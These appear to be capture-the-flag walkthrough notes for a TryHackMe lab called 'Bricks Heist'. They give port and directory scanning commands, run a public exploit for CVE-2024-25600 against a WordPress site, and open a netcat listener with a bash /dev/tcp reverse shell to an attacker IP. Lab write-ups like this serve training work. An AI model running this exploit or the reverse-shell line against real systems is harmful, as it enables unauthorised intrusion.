TryHack3M: Bricks Heist
Add hostname to hosts file
echo $VICTIM bricks.thm >> /etc/hosts
cat /etc/hosts
Scans
Initial scan
Kali
nmap -A $VICTIM


Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/443 - HTTPS
Kali
gobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali
wpscan --url https://bricks.thm/ --disable-tls-checks

Kali
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/

Initial Shell
Kali
nc -lvnp 1337
Kali (Shell)
bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'

Victim
systemctl list-units --type=service --state=running

Victim
systemctl cat ubuntu.service
